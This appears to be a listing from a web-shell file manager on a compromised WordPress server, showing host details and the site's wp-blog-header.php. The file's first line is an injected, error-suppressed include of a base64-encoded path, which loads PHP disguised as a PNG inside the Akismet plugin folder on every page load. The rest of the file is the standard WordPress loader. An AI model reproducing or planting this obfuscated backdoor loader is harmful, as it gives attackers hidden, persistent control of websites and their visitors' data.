HEX
Server: Apache
System: Linux vps35971 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
User: haitiopendh (6209306)
PHP: 8.1.32
Disabled: NONE
Upload Files
File: /home/haitiopendh/haitiopendh/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvaGFpdGlvcGVuZGgvaGFpdGlvcGVuZGgvd3AtY29udGVudC9wbHVnaW5zL2FraXNtZXQvX2luYy9pbWcvbG9nby1wcXJwc29xcm9uLnBuZw==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}